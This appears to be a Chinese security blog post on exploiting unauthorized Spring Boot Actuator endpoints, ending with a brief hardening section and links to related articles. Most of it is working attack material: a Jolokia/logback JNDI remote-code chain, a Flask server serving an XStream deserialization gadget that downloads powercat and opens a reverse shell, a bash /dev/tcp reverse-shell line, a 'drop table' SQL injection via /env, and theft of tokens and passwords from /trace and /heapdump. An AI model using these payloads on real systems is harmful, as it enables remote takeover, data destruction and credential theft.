copy 子杰的哈,懒的写了

0x01 

未授权访问可以理解为需要授权才可以访问的页面由于错误的配置等其他原因,导致其他用户可以直接访问,从而引发各种敏感信息泄露。

0x02 Spring Boot Actuator未授权访问

/dump - 显示线程转储(包括堆栈跟踪)

/autoconfig - 显示自动配置报告

/configprops - 显示配置属性

/trace - 显示最后几条HTTP消息(可能包含会话标识符)

/logfile - 输出日志文件的内容

/shutdown - 关闭应用程序

/info - 显示应用信息

/metrics - 显示当前应用的’指标’信息

/health - 显示应用程序的健康指标

/beans - 显示Spring Beans的完整列表

/mappings - 显示所有MVC控制器映射

/env - 提供对配置环境的访问

/restart - 重新启动应用程序

当 web 应用程序出现 4xx、5xx 错误时显示类似以下页面就能确定当前 web 应用是使用了 springboot 框架。

1)通过'/ jolokia'执行远程代码

前置条件:
在jolokia/list目录检索存在logback组件,则可以使用jolokia远程包含logback.xml配置文件,直接执行远程引用字节码:
http://127.0.0.1:9090/jolokia/list

 

1.在VPS上创建logback.xml,logback中填写jndi服务,当调用时直接触发恶意class。

<configuration>

  <insertFromJNDI env-entry-name="ldap://vps_ip:1389/jndi" as="appName" />

</configuration>

2.创建反弹shell的恶意class,并监听端口8081
javac Exploit.java -> Exploit.class

3.利用marshalsec创建jndi server地址指向恶意class监听的端口8081:

4.监听反弹shell端口:

5.访问springboot以下链接触发远程访问VPS地址logback.xml:
http://127.0.0.1:9090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/VPS地址:8080!/logback.xml
触发回显2333端口接收到主机whomai结果:

 2 Config modification via '/env'

当第一种找不到logback配置可以尝试修改env配置文件进行xstream反序列化
前置条件:Eureka-Client <1.8.7(多见于Spring Cloud Netflix)
比如测试前台json报错泄露包名就是使用netflix:

需要以下2个包

spring-boot-starter-actuator(/refresh刷新配置需要)

spring-cloud-starter-netflix-eureka-client(功能依赖)

1.在VPS创建xstream文件,使用flask返回application/xml格式数据:

# linux反弹shell bash -i >&amp; /dev/tcp/192.168.20.82/9999 0>&amp;1

# windows反弹shell

# <string>powershell</string>

# <string>IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');</string>

# <string>powercat -c 192.168.123.1 -p 2333 -e cmd</string>

from flask import Flask, Response

app = Flask(__name__)

@app.route('/xstream', defaults={'path': ''})

@app.route('/xstream/<path:path>')

def catch_all(path):

    xml = """<linked-hash-set>

  <jdk.nashorn.internal.objects.NativeString>

    <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">

      <dataHandler>

        <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">

          <is class="javax.crypto.CipherInputStream">

            <cipher class="javax.crypto.NullCipher">

              <serviceIterator class="javax.imageio.spi.FilterIterator">

                <iter class="javax.imageio.spi.FilterIterator">

                  <iter class="java.util.Collections$EmptyIterator"/>

                  <next class="java.lang.ProcessBuilder">

                    <command>

                    <string>powershell</string>

                    <string>IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');</string>

                      <string>powercat -c [vps地址] -p 2333 -e cmd</string>

                    </command>

                    <redirectErrorStream>false</redirectErrorStream>

                  </next>

                </iter>

                <filter class="javax.imageio.ImageIO$ContainsFilter">

                  <method>

                    <class>java.lang.ProcessBuilder</class>

                    <name>start</name>

                    <parameter-types/>

                  </method>

                  <name>foo</name>

                </filter>

                <next class="string">foo</next>

              </serviceIterator>

              <lock/>

            </cipher>

            <input class="java.lang.ProcessBuilder$NullInputStream"/>

            <ibuffer></ibuffer>

          </is>

        </dataSource>

      </dataHandler>

    </value>

  </jdk.nashorn.internal.objects.NativeString>

</linked-hash-set>"""

    return Response(xml, mimetype='application/xml')

if __name__ == "__main__":

    app.run(host='172.31.245.127', port=2333)

2.启动服务:

 
python3 flask_xstream.py

3.写入配置:

POST /env HTTP/1.1

Host: 127.0.0.1:9090

Content-Type: application/x-www-form-urlencoded

Content-Length: 68

eureka.client.serviceUrl.defaultZone=http://vps:2333/xstream

刷新触发[POST]:
一般情况需要等待3秒会有响应包,如果立即返回可能是服务缺少spring-boot-starter-actuator扩展包无法刷新漏洞则无法利用

获取反弹shell:

2) 这个主要通过访问/trace 路径获取用户认证字段信息
可能会在其 trace 路径下,除了记录有基本的 HTTP 请求信息可能有包括用户 token、cookie 等字段:

3) 这个主要通过/env 路径获取这些服务的配置信息修改配置信息

运气好会有mysql、mangodb 的用户名及密码

如果Spring Cloud Libraries在类路径中,则'/ env'端点允许修改Spring环境属性。注释为“ @ConfigurationProperties”的所有bean 都可以修改和重新绑定。我们可以控制的许多(但不是全部)属性列在'/ configprops'执行器端点上。

spring.datasource.tomcat.validationQuery = drop + table + users - 允许任何SQL查询,它将自动对当前数据库执行。它可以是任何语句,包括插入,更新或删除。

4) git 项目地址泄露

这个一般是在/health 路径,比如如下站点,访问其 health 路径可探测到站点 git 项目地址:

5) 这个一般是在/heapdump 路径获取后台用户账号密码泄露
访问/heapdump 路径,返回 GZip 压缩 hprof 堆转储文件。在 Android studio 打开,会泄露站点内存信息,很多时候会包含后台用户的账号密码。

防范措施

如果上述请求接口不做任何安全限制,安全隐患显而易见。实际上Spring Boot也提供了安全限制功能。比如要禁用/env接口,则可设置如下:

endpoints.env.enabled= false

如果只想打开一两个接口,那就先禁用全部接口,然后启用需要的接口:

endpoints.enabled = false

endpoints.metrics.enabled = true

另外也可以引入spring-boot-starter-security依赖

<dependency>

            <groupId>org.springframework.boot</groupId>

            <artifactId>spring-boot-starter-security</artifactId>

</dependency>

在application.properties中指定actuator的端口以及开启security功能,配置访问权限验证,这时再访问actuator功能时就会弹出登录窗口,需要输入账号密码验证后才允许访问。

management.port=8099

management.security.enabled=true

security.user.name=admin

security.user.password=admin

Springboot之actuator未授权访问的更多相关文章

  1. Spring Boot Actuator未授权访问

    当我们发现某一个网页的logo是一篇叶子或者报错信息如下图所示的话,就可以尝试Spring Boot Actuator未授权访问. /dump - 显示线程转储(包括堆栈跟踪) /autoconfig ...

  2. mongodb未授权访问漏洞

    catalogue . mongodb安装 . 未授权访问漏洞 . 漏洞修复及加固 . 自动化检测点 1. mongodb安装 apt-get install mongodb 0x1: 创建数据库目录 ...

  3. Redis未授权访问漏洞分析

    catalog . Redis简介 . 漏洞概述 . 漏洞利用方式 . 修复方式 1. Redis简介 Relevant Link: http://www.cnblogs.com/LittleHann ...

  4. 【转+自己研究】新姿势之Docker Remote API未授权访问漏洞分析和利用

    0x00 概述 最近提交了一些关于 docker remote api 未授权访问导致代码泄露.获取服务器root权限的漏洞,造成的影响都比较严重,比如 新姿势之获取果壳全站代码和多台机器root权限 ...

  5. Zookeeper未授权访问

    l 漏洞名称: zookeeper未授权访问 l  漏洞影响版本: zookeeper l  漏洞细节: ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubb ...

  6. [ Redis ] Redis 未授权访问漏洞被利用,服务器登陆不上

    一.缘由: 突然有一天某台服务器远程登陆不上,试了好几个人的账号都行,顿时慌了,感觉服务器被黑.在终于找到一个还在登陆状态的同事后,经查看/ect/passwd 和/etc/passwd-异常,文件中 ...

  7. WordPress Backdoor未授权访问漏洞和信息泄露漏洞

    漏洞名称: WordPress Backdoor未授权访问漏洞和信息泄露漏洞 CNNVD编号: CNNVD-201312-497 发布时间: 2013-12-27 更新时间: 2013-12-27 危 ...

  8. Redis未授权访问缺陷让服务器沦为肉鸡

    朋友的一个项目说接到阿里云的告警,提示服务器已沦为肉鸡,网络带宽被大量占用,网站访问很慢,通过SSH远程管理服务器还频繁断开链接.朋友不知如何下手,便邀请我帮忙处理. 阿里云的安全告警邮件内容: 在没 ...

  9. 验证docker的Redis镜像也存在未授权访问漏洞

    看到了这篇老外的博客:Over 30% of Official Images in Docker Hub Contain High Priority Security Vulnerabilities于 ...

随机推荐

  1. Linux中的程序和进程,PID和PPID

    环境:Vmware Workstation:CentOS-6.4-x86_64 程序和进程: 1.程序:程序是静止的,程序就是磁盘上的一个文件. 2.进程:进程是一个正在执行的程序的实例. 3.进程是 ...

  2. 李婷华 201771010113 《面向对象程序设计(java)》 第二周学习总结

    第一部分:理论知识学习部分 第三章 java的基本程序设计结构 本章主要学习数据类型.变量.运算符.类型转换.字符串.输入输出.控制流程.大数值.数组等内容. 1.基本知识 (1)标识符:由字母.下划 ...

  3. Linux dts 设备树详解(二) 动手编写设备树dts

    Linux dts 设备树详解(一) 基础知识 Linux dts 设备树详解(二) 动手编写设备树dts 文章目录 前言 硬件结构 设备树dts文件 前言 在简单了解概念之后,我们可以开始尝试写一个 ...

  4. Istio的流量管理(实操一)(istio 系列三)

    Istio的流量管理(实操一)(istio 系列三) 使用官方的Bookinfo应用进行测试.涵盖官方文档Traffic Management章节中的请求路由,故障注入,流量迁移,TCP流量迁移,请求 ...

  5. printf小结

    下午健身前和lxt兄弟讨论了一个关于 printf 输出的问题,恰巧以前见过类似的,回来写一个收获总结. 首先看一个这样一个例子 #include<cstdio> int i; int m ...

  6. python --集合set的学习

    集合是一个无序的不重复的元素序列,一般我们使用set(value)函数来创建集合. 如下: 定义以及添加元素,以及注意点如下: 再如下:

  7. PMS学习

    一,PMS的adb相关重要指令 1,adb shell dumpsys package(dump所有的系统内apk信息) 2,adb shell dumpsys package “com.androi ...

  8. JSP+Servlet+JDBC+mysql实现的学生成绩管理系统

    项目简介 项目来源于:https://gitee.com/zzdoreen/SSMS 本系统基于JSP+Servlet+Mysql 一个基于JSP+Servlet+Jdbc的学生成绩管理系统.涉及技术 ...

  9. 关于RAID小结

    独立硬盘冗余阵列(RAID, Redundant Array of Independent Disks),旧称廉价磁盘冗余阵列(Redundant Array of Inexpensive Disks ...

  10. 【python(deap库)实现】GEAP 遗传算法/遗传编程 genetic programming +

    目录 前言 1.优化问题的定义 单目标优化 多目标优化 2.个体编码 实数编码 二进制编码 序列编码(Permutation encoding) 粒子(Particles) 3 初始种群建立 一般族群 ...